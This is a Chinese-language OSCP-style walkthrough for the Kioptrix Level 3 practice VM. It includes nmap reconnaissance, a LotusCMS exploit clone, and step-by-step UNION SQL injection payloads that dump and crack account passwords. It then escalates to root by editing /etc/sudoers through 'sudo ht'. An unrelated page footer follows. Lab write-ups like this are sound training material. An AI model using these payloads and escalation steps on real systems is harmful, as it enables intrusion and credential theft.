#oscp#渗透测试 kioptix level 3靶机getshell及提权教程
声明!
文章所提到的网站以及内容,只做学习交流,其他均与本人以及泷羽sec团队无关,切勿触碰法律底线,否则后果自负!!!!
一、靶机搭建
点击扫描虚拟机
选择靶机使在文件夹即可
二、信息收集
前言
信息收集阶段,因为这里是靶机,所以不需要做什么,但是实际渗透测试中,大家一定要学会正确的隐藏自己的个人信息
扫完ip后即可得到以下信息
kali:192.168.108.130
目标ip:192.168.108.137
扫ip
nmap -sn 192.168.108.0/24
排除已知的,这个则是靶机ip
扫端口和服务信息
nmap -p 1-65535 192.168.108.137
nmap -sV 192.168.108.137
可用信息
OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
指纹探测
nmap 192.168.108.137 -p 22,80 -sV -sC -O --version-all
得到以下信息
操作系统信息:
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
三、踩点或预探测
1.访问web服务
有以下页面
有登录框,可能存在漏洞,尝试弱口令无果
有个页面不可正常访问,可能是DNS缓存的问题,去设置一下
2. 设置域名解析
1. windows环境下
首先如果浏览器访问过该网站,需要找到浏览器缓存,这里我使用的火狐浏览器,点击管理数据
找到刚才的网站,删除缓存
在下面的目录下,选择host属性
C:\Windows\System32\drivers\etc
设置权限
设置之后在记事本编辑,设置如下,靶机ip 域名
然后刷新缓存即可
2. linu环境下设置
sudo vim /ets/hosts
输入以下保存即可
靶机ip kioptrix3.com
全部完成之后这个页面即可正常访问
3. 找出可利用点
sql注入
逐个点击之后发现此处存在id参数
尝试利用
测试id=2;id=1',发现报错,应该存在sql注入漏洞
LotusCMS漏洞
searchsploit LotusCMS
第一个需要利用msfconsle,这里我们用第二个
github上搜索
复制以下链接
https://github.com/Hood3dRob1n/LotusCMS-Exploit.git
执行
git clone https://github.com/Hood3dRob1n/LotusCMS-Exploit.git/
拉取成功
四、采取攻击措施
数据库爆破常用参数
爆列数
?id=1 order by 7--
爆行数
?id=2 union select 1,2,3,4,5,6--
爆数据库
?id=2 union select 1,database(),3,4,5,6--
得到数据库名: gallery
爆表
?id=2 union select 1,group_concat(table_name),3,4,5,6 from information_schema.columns where table_schema=database()--
结果
爆元素
?id=2 union select 1,group_concat(column_name),3,4,5,6 from information_schema.columns where table_schema=database() and table_name='dev_accounts'--
逐个查询表中元素,在第一个表中看到以下信息
查看此内容
?id=2 union select 1,group_concat(username),group_concat(password),4,5,6 from dev_accounts--
加密的MD5值:
用户名:dreg,loneferret
密码:0d3eccfb887aabd50f243b3f155c0f8,5badcaf789d3d1d09794d8f021f40f0e
用户名:dreg,loneferret
密码:Mast3r,starwars
登录
有两中方法,一种利用shell,一种直接在靶机登录
登录成功
五、提权
靶机
试试另外一个账户,输入exit退出登录
可以看到有checksec.sh,CompanyPolicy.README这两个文件
做到这一步就没有什么头绪了,换另一种方式也没用,这个时候需要删除虚拟机,重新导入
cat CompanyPolicy.README
sudo ht
重新导入后执行sudo ht 结果如下,按F3搜索,并输入etc/sudoers
此处添加/bin/bash,按F10保存并退出
提权成功
kali执行shell连接
看到需要加密算法,这里我利用了gpt找到了解决办法,实际考试是不允许的,所以平时学习遇到的新一定要熟练掌握
利用代码:
ssh -o HostKeyAlgorithms=+ssh-rsa loneferret@192.168.108.137
成功登录
sudo ht
发现需要添加环境变量
添加环境变量
export TERM=xterm
再次执行 sudo ht,后面的步骤则和之前一样
#oscp#渗透测试 kioptix level 3靶机getshell及提权教程的更多相关文章
- 《Python黑帽子:黑客与渗透测试编程之道》 Windows系统提权
环境准备: pywin32的安装在第八章的键盘记录中有,这里还需要安装wmi: 在本人的32位win7上本来是没有easy_install这个命令的,这需要安装setuptools-0.6c11.wi ...
- 从getshell到提权
从getshell到提权 一.起因 学校推出新的党建系统,之前党建系统还参与开发,后来因为一些原因没有开发,主要想看看这届工作室的学弟.学妹代码水平,把源码撸下来审计一下,工作室用git开发的,记着上 ...
- [经验分享] OSCP 渗透测试认证
http://f4l13n5n0w.github.io/blog/2015/05/05/jing-yan-fen-xiang-oscp-shen-tou-ce-shi-ren-zheng/ “120天 ...
- 2019-9-9:渗透测试,基础学习,phpmyadmin getshell方法,基于时间的盲注,基于报错的注入,笔记
phpmyadmin getshell方法1,查看是否有导入导出设置 show global variables like '%secure-file-priv%';2,如果secure-file-p ...
- 小白日记24:kali渗透测试之提权(四)--利用漏洞提权
利用漏洞提权实例 前提:已渗透进一个XP或2003系统 一.实验目标漏洞:Ms11-080 补丁:Kb2592799 漏洞信息:https://technet.microsoft.com/librar ...
- LINUX渗透与提权总结
本文为Linux渗透与提权技巧总结篇,旨在收集各种Linux渗透技巧与提权版本,方便各位同学在日后的渗透测试中能够事半功倍. Linux 系统下的一些常见路径: 001 /etc/passwd 002 ...
- Oracle 10g提权测试
一直想摸索一下orcl提权的方式,今天测试了一下10g,可以成功提权. C:\wmpub>sqlplus scott/tiger@orcl SQL*Plus: Release 10.2.0.1. ...
- PHPMyWind5.4存储XSS后续getshell提权
0x0 前言 通过留言处的xss,我们可以得到管理员的cookie,进而登陆后台: https://www.cnblogs.com/Rain99-/p/10701769.html 现在要从后台入手,进 ...
- DC-8 靶机渗透测试
DC-8 渗透测试 冲冲冲 ,好好学习 . 核心:cms上传添加存在漏洞组件,利用该组件getshell 操作机:kali 172.66.66.129 靶机:DC-4 172.66.66.137 网络 ...
- Kali Linux Web渗透测试手册(第二版) - 1.3 - 靶机的安装
Kali Linux Web渗透测试手册(第二版) - 1.3 - 靶机的安装 一.配置KALI Linux和渗透测试环境 在这一章,我们将覆盖以下内容: 在Windows和Linux上安装Virt ...
随机推荐
- python08_05day
#!/usr/bin/python# -*- coding: UTF-8 -*-from _ast import Param #查询数据库'''import MySQLdb conn = MySQLd ...
- Docker基本操作(镜像操作?容器操作?)(四)
Docker 的基本原理我们已经了解了,也已经安装上了,接下来我们就一起来学习下 Docker 的常用操作,实际上主要就是 Docker CLI 的一些常用命令使用. 一.镜像操作 之前我们提到过 D ...
- LNMP 和 LAMP 对比 (仅供参考)
Nginx 性能稳定.功能丰富.运维简单.处理静态文件速度快且消耗系统资源极少. Apache 是 LAMP 架构最核心的 Web Server,开源.稳定.模块丰富是 Apache 的优势.但 Ap ...
- 《Spring Data JPA从入门到精通》内容简介、前言
内容简介 本书以Spring Boot为技术基础,从入门到精通,由浅入深地介绍Spring Data JPA的使用.有语法,有实践,有原理剖析. 本书分为12章,内容包括整体认识JPA.JPA基础查询 ...
- `operator++(int)` 和 `operator++()`
operator++(int) 和 operator++() 是 C++ 中重载的两个不同的自增运算符函数,它们分别用于后置自增和前置自增.它们的区别在于调用方式以及自增行为的不同. 1. 前置自增运 ...
- vue2基于 vue-cropper插件对图片裁剪
<template> <div id="app"> <div class="model" v-show="model&q ...
- windows下安装部署 hadoop
一.安装下载 1.首先在hadoop官网下载一个稳定版本,选择binary包 官网地址:https://hadoop.apache.org/releases.html 下载下来是tar.gz文件,用w ...
- 背靠AI,让AI当牛马,解决程序员的烦恼
开篇问题? 作为程序员的你,写代码累吗?累!苦嘛?苦,想哭嘛?哭不出来. 还在为工作中繁重的编码任务.复杂的调试过程以及不断更新的技术栈而苦恼吗?这些挑战不仅消耗大量的时间和精力,还时常让人陷入思维的 ...
- 云原生周刊:KubeSphere 宣布开源 Thanos 的企业级发行版 Whizard
开源项目推荐 Admiralty Admiralty 是一个 Kubernetes 控制器系统,可以智能地在多个集群之间调度工作负载.它使用简单,并且易于与其他工具集成. Cozystack Cozy ...
- SpringBoot 2.3 升级到 SpringBoot 2.7 爬坑-- SpringDoc & Swagger
目录 POM yml 配置自定义的 OpenAPI 规范 拦截器去除 swagger 的接口验证 模型 Controller 配置 常用注解 注意:Swagger支持SpringBoot2.0但不支持 ...